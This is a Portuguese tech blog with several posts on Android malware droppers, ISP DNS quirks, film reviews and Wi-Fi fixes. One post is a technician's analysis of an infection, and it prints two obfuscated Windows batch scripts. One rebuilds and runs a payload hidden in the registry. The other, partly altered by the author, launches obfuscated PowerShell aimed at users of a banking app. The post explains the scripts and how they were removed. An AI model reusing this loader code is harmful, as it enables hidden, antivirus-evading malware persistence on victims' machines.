 Jefferson,  21 de julho de 2018, android Ontem saiu um texto no BleepingComputer afirmando que o principal método que os criadores de malware usam para continuar usando a Play Store como porta de entrada é pelo uso de droppers, que é uma técnica velha conhecido no mundo Windows onde o programa que você baixa voluntariamente não carrega nenhum malware em si, mas o código necessário para baixar esse malware de outro lugar, que é mais difícil de detectar.
Porém isso me deixou com uma pulga na orelha. Como é possível o Android permitir que uma app baixe e execute outro código? Além de isso ser claramente uma temeridade, o Android é baseado em Linux, que usa um modelo de segurança onde é muito fácil definir que a app não possa escrever em seu próprio diretório (onde ela tem permissões de execução) e não tenha permissão de execução em nenhum diretório de dados. Então, como se explica isso?
Essa análise diz que isso é possível quando “fontes desconhecidas” está habilitado no Android. O código malicioso é instalado como uma app extra, silenciosamente. Como se isso já não fosse suficientemente ruim (como assim uma app pode instalar outra app sem um prompt para o usuário?) o mesmo artigo diz que a app maliciosa pode habilitar “fontes desconhecidas” por ela mesma se você tiver dado a ela acesso ao serviço de acessibilidade.
Pode isso Arnaldo?!
Eu sabia que o serviço de acessibilidade permitia muita coisa, mas instalação de outras apps é demais. Ou o artigo está exagerando a “facilidade” ou a segurança do Android é uma peneira.
Isso sem contar com o fato de que ainda não entendi como é que certas apps de emulação de consoles de videogame no Android conseguem baixar parte de seu código depois de instaladas.
(Prefira clicar em "Responder" se estiver comentando um comentário)
 Jefferson,  21 de julho de 2018, manutenção, Redes Ontem um cliente empresarial me chamou dizendo que não tinha acesso ao Hotmail em nenhuma máquina da empresa apesar de ter internet normalmente. Ao chegar, constatei que o acesso parava ao tentar chegar à tela de login no endereço login.live.com. A primeira coisa que tentei foi mudar os servidores DNS da máquina para os da Google mas não surtiu efeito. Então eu tentei um ping para esse endereço e vi que até obtinha o endereço IP, mas o ping falhava. Então conclui que não deveria ser problema de DNS.
Liguei para o suporte técnico do provedor de acesso e a solução dada por eles me surpreendeu: mudar o servidor DNS para o da Cloufdflare. Eu estava cético, mas como ele disse que tinha testado em pelo menos dois outros clientes, eu testei assim mesmo. E funcionou.
Eu comentei com o técnico do provedor que isso era bizarro e ele admitiu que também não entendia a razão e o analista deles estava estudando o problema.
(Prefira clicar em "Responder" se estiver comentando um comentário)
 Jefferson,  16 de julho de 2018, Ou, no mínimo, vão passar a exigir que você faça login para usar.
A Google já havia anunciado que ia passar a cobrar pelo uso de sua API em maio, mas só a partir de hoje a empresa começou a exigir um número de cartão de crédito anexado a cada conta.
Isso significa que muitos serviços gratuitos online e apps baseados no Google Maps devem parar de funcionar nas próximas semanas. A Google oferece um crédito de até 200 dólares mensais que permite que certas atividades como a carga de “mapas estáticos ou dinâmicos” em um dispositivo móvel sejam “ilimitadas”, mas já limita o mesmo uso “pela web” (suponho que isso significa qualquer uso que não seja por uma app) a algo entre 28500 e 100mil acessos. É incerto como isso vai atingir, por exemplo, o Dishpointer. E é claro que ninguém deve esperar que esse crédito dure para sempre.
(Prefira clicar em "Responder" se estiver comentando um comentário)
 Jefferson,  10 de julho de 2018, A TV UN40ES6500 de minha mãe veio com dois óculos modelo SSG-4100GB. Usei apenas alguns dias para teste e guardei. Foram cinco anos guardados. Fui olhar na semana passada e as baterias CR2025 de ambos estavam completamente descarregadas. Eu sinceramente esperava mais de baterias Mitsubishi originais de um produto Samsung, mas eu posso estar superestimando a durabilidade desse tipo de coisa.
Eu sou do tempo em que os programas de computador eram claramente divididos em:
- utilitários: programas que só existem para manutenção do computador e não para atender a uma necessidade concreta do usuário, como defragmentadores e antivirus;
- aplicações: Os programas relacionados com “produtividade”, que efetivamente o usuário comprava o computador para usar, como processadores de texto, planilhas eletrônicas, comunicação, etc;
- Jogos
O que eu vejo hoje, talvez por ter-se escolhido o nome de “app” para designar “programas móveis” (uma decisão infeliz na minha opinião), é um grande número de técnicos que não sabe distinguir uma coisa da outra e tudo virou “app”. Isso geralmente não é problema, mas quando um texto tenta traduzir “app” como “aplicação” e não como “programa” a confusão está feita. Eu entendo que a computação se tornou tão onipresente na vida das pessoas que é até possível argumentar que está progressivamente mais difícil fazer uma distinção entre utilitários e aplicações, mas eu não consigo deixar de ficar incomodado quando percebo o significado de palavras sendo diluído.
(Prefira clicar em "Responder" se estiver comentando um comentário)
 Jefferson,  08 de julho de 2018, Filmes Eu gostei dos atores, dos personagens de um modo geral, da direção e dos efeitos especiais, mas o roteiro às vezes empolga e às vezes é de uma idiotice incômoda. O meu primeiro problema foi com o comandante condecorado que decide combater de frente, com helicópteros, um monstro jamais visto antes, sem antes fazer uma retirada estratégica (que poderia ser para cima) para avaliar o poder do inimigo. E eles poderiam aproveitar que estavam longe do alcance para bombardear a fera. Mas nãaaaooo. O roteiro tinha que ter um gorila gigante sendo molestado inutilmente por aeronaves porque afinal estamos falando de King Kong.
(Prefira clicar em "Responder" se estiver comentando um comentário)
 Jefferson,  08 de julho de 2018, Esta semana o parlamento europeu repeliu, por enquanto (os autores certamente não desistiram), uma insana lei que tinha o objetivo de combater violações de copyright pela internet daquele jeito maluco que só pode ser idéia da “MAFIAA” (RIAA/MPAA). Num dos artigos queriam também tentar, de novo, obrigar empresas como a Google a pagar pelas citações (com respectivos links) para sites de jornais e revistas. Diante de como isso deu certo para Belgica em 2006, Alemanha em 2013 e a Espanha em 2014 é impossível não dar risada e ao mesmo tempo ficar espantado com a teimosia (aparentemente) insana dessa gente. Falharam espetacularmente em pelo menos três países e agora tentam para a Europa inteira. Esta jornalista espanhola resumiu a palhaçada muito bem em uma frase (a ênfase é minha): “você não pode exigir compensação por algo que beneficia você, só porque beneficia outros também”
Outro artigo da lei, mais preocupante, responsabilizava as “plataformas” por verificar o copyright de tudo o que era publicado nelas por seus usuários, o que obrigaria gigantes como Google, Facebook e Reddit a literalmente “filtrar a internet”. Vocês lembram quando a Google bloqueou o AdSense para o meu site por causa de duas capas de DVD que eu exibia apenas para ilustrar uma situação cômica? E como eu não consigo exibir código de vírus no meu blog sem temer que a Hostgator me suspenda por violações de ToS? Imagine uma vigilância (burra) cem vezes pior. Esta semana mais um Youtuber foi acusado de infringir o próprio copyright pelo sistema automatizado de filtragem do Youtube que a empresa é obrigada a manter e uma página comentando uma lei sobre abuso sexual de crianças foi cortada do Adsense por “violar as políticas do serviço”, o que me lembra de quando meu perfil Google foi suspenso.
Essas empresas já tem poder demais sobre o que é publicado na internet.
(Prefira clicar em "Responder" se estiver comentando um comentário)
 Jefferson,  08 de julho de 2018, Esta semana eu me deparei com um malware usando uma técnica da qual eu sequer tinha ouvido falar. Encontrei na máquina do cliente uma dezena de arquivos com um conteúdo similar a este:
|
|
@Echo off Setlocal EnableExtensions Setlocal EnableDelayedExpansion Set uclu3ixhy=HKCU Set uclu3ixhy=%uclu3ixhy%\Software Set uclu3ixhy=%uclu3ixhy%\Microsoft Set di5bupl2q= FOR /F "usebackq tokens=1,2*" %%1 IN (`REG QUERY %uclu3ixhy%`) DO ( Set hvliceagt=%%11 IF "!hvliceagt:~0,10!"=="w2g6w2cmf-" ( Set di5bupl2q=!di5bupl2q!%%3 ) ) %di5bupl2q% |
Você consegue entender só de olhar esse código o que ele está fazendo? Eu lamento dizer que eu não consegui, porque a partir da linha seguinte ao FOR eu não fazia a mínima idéia do que se passava, mesmo depois de ler o código umas dez vezes. Eu tive que consultar a chave do Registro que ele tentou obfuscar nos primeiros comandos SET (HKCU\Software\Microsoft) para entender que o que esses últimos comandos fazem é montar um script em uma única linha a partir do conteúdo maliciosamente armazenado lá e lido linha por linha pelo comando FOR. Script esse que é executado no final.
O real código do malware estava escondido no Registro, ligeiramente obfuscado. Só consegui entender que parecia se tratar de um script Powershell.
Eu enviei uma amostra do .bat para o Virustotal e nenhum dos 58+ mecanismos antivírus lá pôde detectar o código como malicioso, o que não me surpreendeu. Um humano é capaz de detectar porque pelo nome, localização e conteúdo do .bat fica evidente que o propósito é malicioso, mesmo que você leia 10 vezes o que está escrito e não consiga decifrar o que ele faz. Mas para uma máquina o código realmente deve parecer inofensivo.
Como nenhum antivírus pôde me dar uma pista do que se tratava (e o AVAST estava em execução nessa máquina) e eu não sabia como mandar uma amostra do código oculto no Registro, eu me limitei a apagar o código no Registro e todos os arquivos suspeitos que encontrei criados ou modificados desde a data que eu deduzi para a infecção.
Eu fui então checar o quanto esconder malware no Registro é comum e para minha surpresa desde 2014 existem até modos de fazer isso sem criar nenhum arquivo para chamar atenção. Eu suponho que todos esses métodos usem exploits que já foram eliminados por atualizações do Windows ou são facilmente localizados por antivírus porque senão eu já teria conhecimento dessa praga há muito mais tempo.
O malware também cria outro tipo de .bat, mas como esse é detectado pelo Avira (o único dos mecanismos do Virustotal que o reconhece) eu não posso publicá-lo aqui como texto na integra ou meu blog será marcado como malicioso então vou transcrever uma versão ligeiramente re-obfuscada dele:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
|
IF NOT EXIST "%LOCALAPPDATA%\A p l i cativo Itau" ( //eu mexi nessa linha goto EXIT; ) @echo off cd %SystemRoot%\System32 set UznjZq= Set UznjZq=%UznjZq%GXCMJeQujkU Set UznjZq=%UznjZq%KpbDEfSz5dr Set UznjZq=%UznjZq%PWIHl09o62q Set UznjZq=%UznjZq%TNOa7Rv4wV8 Set UznjZq=%UznjZq%3mBnyixAhYt Set UznjZq=%UznjZq%FZgsL1c set aa=^| set sistema= Set sistema=%sistema%%UznjZq:~49,1%%UznjZq:~5,1%%UznjZq:~50,1%(%UznjZq:~34,1%%UznjZq:~5,1%%UznjZq:~41,1%-%UznjZq:~35,1%%UznjZq:~13,1%%UznjZq:~8,1%%UznjZq:~5,1%%UznjZq:~61,1%%UznjZq:~54,1% //(deletei 12 linhas com um conteúdo bem parecido com o da linha acima) Set sistema=%sistema%") echo %%sistema%%%aa%%UznjZq:~23,1%%UznjZq:~49,1%%UznjZq:~47,1%%UznjZq:~20,1%%UznjZq:~29,1%%UznjZq:~41,1%%UznjZq:~58,1%%UznjZq:~22,1%%UznjZq:~29,1%%UznjZq:~41,1%%UznjZq:~5,1%%UznjZq:~21,1%%UznjZq:~17,1%%UznjZq:~52,1%%UznjZq:~5,1%%UznjZq:~26,1%%UznjZq:~26,1%\%UznjZq:~39,1%%UznjZq:~60,1%.%UznjZq:~27,1%\%UznjZq:~12,1%%UznjZq:~29,1%%UznjZq:~41,1%%UznjZq:~5,1%%UznjZq:~21,1%%UznjZq:~58,1%%UznjZq:~52,1%%UznjZq:~5,1%%UznjZq:~26,1%%UznjZq:~26,1%.%UznjZq:~5,1%%UznjZq:~50,1%%UznjZq:~5,1% -%UznjZq:~47,1%%UznjZq:~29,1%%UznjZq:~12,1% -%UznjZq:~41,1%%UznjZq:~49,1%%UznjZq:~47,1% %UznjZq:~60,1% - EXIT: |
Você consegue entender o que raios isso faz? Tirando o fato de que não executa se o o Aplicativo Itaú não estiver instalado na máquina e montar uma looonga linha de código obfuscado, não faço a menor idéia, mas o Avira chama de TR/PowerShell.Gen
(Prefira clicar em "Responder" se estiver comentando um comentário)
 Jefferson,  01 de julho de 2018, android Eu estava com um de meus tablets Android ignorando o botão power depois que a tela apagava. Eu não conseguia mais acender a tela e segurar o botão não provocava o desligamento do tablet. Parecia mesmo com um defeito no hardware. Eventualmente, após muitas tentativas, a tela acendia e havia um anúncio em tela cheia que eu não sabia de onde vinha. Uma vez eu consegui acender a tela plugando o carregador e aí apareceu uma mensagem de erro que me levou ao provável culpado: um jogo mixuruca que eu instalara para o meu sobrinho tinha instalado dois serviços e um processo para rodar sempre ao ligar o tablet, mesmo que o jogo não fosse usado. A app é praticamente um exibidor de anúncios e não um jogo. Eu não sei se as versões mais novas do Android oferecem a possibilidade de negar esse tipo de permissão a uma app, mas isso certamente faz falta na 4.x. Em retrospecto, eu deveria estar vigiando a lista de apps em execução desses tablets.
Tive uma surpresa ao achar a bateria original do meu Samsung Grand Duos, que estava guardada há meses, estufada. Até hoje eu só vira isso acontecer com baterias não-originais. Entretanto, mesmo estufada a bateria ainda está em melhor condição que a bateria não-original que comprei para ele.
Paguei este mês R$139 para consertar minha lavadora Karcher Junior na autorizada Karcher e já me arrependi. No primeiro uso a lavadora já começou a apresentar o mesmo defeito (o serviço tem garantia de três meses) e ontem eu vi uma Karcher K2 por R$249 no Walmart da Avenida Recife. E custa quase isso (mesmo incluindo o frete) se eu comprar na loja online do Extra.
(Prefira clicar em "Responder" se estiver comentando um comentário)
 Jefferson,  28 de junho de 2018, Filmes O filme estava na minha lista há muito tempo por ser um clássico entre nerds e seus diálogos darem nome a várias tropes e memes. A direção e o enredo são fracos e os valores de produção são muito baixos, mas os diálogos divertem e gostei dos atores. E por falar nisso, eu estava realmente querendo ver como era a Robin Wright mais jovem e, francamente, acho que ela está melhor agora, mais velha, no papel da General Antiope em Wonder Woman. Neste filme ela é apenas a “carinha bonita” e não espere muita expressividade dela.
O filme tem muito pouco de romance (é só um pretexto para a comédia e a aventura) , mas se você chamar a namorada para assistir junto, além de marcar mais um ponto no cartão de nerd ainda pode marcar um ponto com a “patroa”. Ela nem pode alegar que você está assistindo por causa de Robin Wright porque nesse filme a única pele que você vê dela é o rosto e as mãos. Bem diferente, por exemplo, da princesa Jehnna em Conan, o Destruidor. Essa faria a patroa querer cobrir seus olhos o tempo todo.
(Prefira clicar em "Responder" se estiver comentando um comentário)
 Jefferson,  25 de junho de 2018, android Eu estava com esse problema com um Acer Iconia 7 B1-730, mas ao pesquisar descobrir que é algo relativamente comum. Além de que ter que redigitar as senhas de novo era preciso reconfigurar as redes (IP, gateway, etc). No meu caso a solução foi:
- Obter acesso root no tablet (outro dia eu explicarei como fiz isso no meu);
- Renomear o arquivo
/data/misc/wifi/wpa_supplicant.conf (eu usei o ES File Manager);
O problema provavelmente era de permissões. O sistema não estava conseguindo escrever no arquivo e ao renomeá-lo outro foi automaticamente criado com as permissões corretas.
O arquivo original tinha apenas o seguinte conteúdo:
|
|
country=BR ctrl_interface=wlan0 |
Ao ser recriado automaticamente e eu ter conectado a uma de minhas redes o conteúdo era este (eu editei com xxxxxxx o que era pessoal):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
|
ctrl_interface=wlan0 update_config=1 device_name=b1-730_ww_gen1 manufacturer=Acer model_name=B1-730 model_number=B1-730 serial_number=xxxxxxxxxx device_type=10-0050F204-5 config_methods=physical_display virtual_push_button country=BR bss_expiration_age=30 bss_expiration_scan_count=10 network={ ssid="xxxxxxxxxx" psk="xxxxxxxxx" key_mgmt=WPA-PSK } |
Em outros tablets
Eu encontrei a minha solução neste post, que sugere outras possibilidades, todas exigindo acesso root ao aparelho. A localização do arquivo pode ser diferente dependendo do fabricante e da versão do Android. O arquivo poderia ser, por exemplo:
/data/wifi/bcm_supp.conf
Eu notei que as configurações de rede que defini (IP, gateway, DNS) estavam sendo guardadas corretamente em ipconfig.txt, mas renomeei o arquivo assim mesmo e este também foi recriado automaticamente. Seu problema também pode estar relacionado com secure storage e nesse caso você teria que mudar a linha
ro.securestorage.support=true para
false no arquivo build.prop.
(Prefira clicar em "Responder" se estiver comentando um comentário)
|
|
Eu me lembro de ter lido sobre um malware para Android que era capaz de executar código baixado depois da instalação em uma imagem jpg, mas não estou conseguindo achar a fonte. Este texto fala de uma técnica que permite esconder uma outra app inteira dentro de uma imagem exibida e instalá-la silenciosamente, mas não é a mesma coisa. É mais fácil detectar uma app que você não instalou (eu acho) do que detectar comportamento malicioso de uma que você instalou.
Eu preciso apontar que no mundo Windows não faltam notícias sobre “vulnerabilidades” descobertas por “pesquisadores de segurança” que são apenas o Windows operando do jeito que foi projetado para operar, como dizer que uma app com permissões de administrador poder mudar uma configuração vital do Registro é uma “vulnerabilidade” (dãaaa). Como eu entendo como o Windows funciona, para mim é fácil separar o sensacionalismo das vulnerabilidades reais. Mas das entranhas do Android eu sou um ignorante e por isso estou sujeito a aceitar bullshit como verdade.
Eu nunca tive smartphone com Android(sou avesso a celulares), mas tenho instalado no Windows o Nox Player que é um emulador de Android. De vez em quando ele instala jogos automaticamente. No momento estou com um tal Lineage 2: revolution que nunca ouvi falar. Nem gosto de games.
Enfim, a questão é: Não posso provar, mas estou desconfiando que além desses jogos, esse Android do emulador está permitindo download e execução de arquivos exe, maliciosos, no próprio Windows.
Eu nunca tinha visto isso. Há uns 2 meses encontrei uns malwares na pasta raiz(C:). Passei o Combofix e resolveu.
Depois de um tempo, os mesmos arquivos, um chamado setup.exe. O outro, 321.exe.
Faz mais de uma década que não uso antivírus nem firewall, mas resolvi me render ao Comodo Firewall. Então na terceira vez que os malwares seriam instalados, ele me avisou. A primeira pergunta foi se eu permitiria a instalação(hein?). A pergunta seguinte foi se eu permitiria uma alteração numa chave do registro. Claro que neguei tudo.
Antes que surjam as velhas opiniões sobre antivírus, da época do Windows 95/98, como eu disse, faz muitos anos que não uso AV residente. Sou muito cuidadoso. Esse problema é recente, desde que passei a usar emulador de Android.
Por curiosidade: por que usas emulador de Android?
Não gosto de aparelho celular. Nem mesmo de telefone de qualquer tipo. Acho incômodo uma pessoa ligar pra mim sem saber se estou disponível pra falar. Mas como o gosto da maioria é que manda, já que tudo hoje em dia é smartphone pra isso, smarphone pra aquilo, preciso do whatsapp e de programas(“aplicativos”) de banco. A solução mais viável pra mim é usar emulador.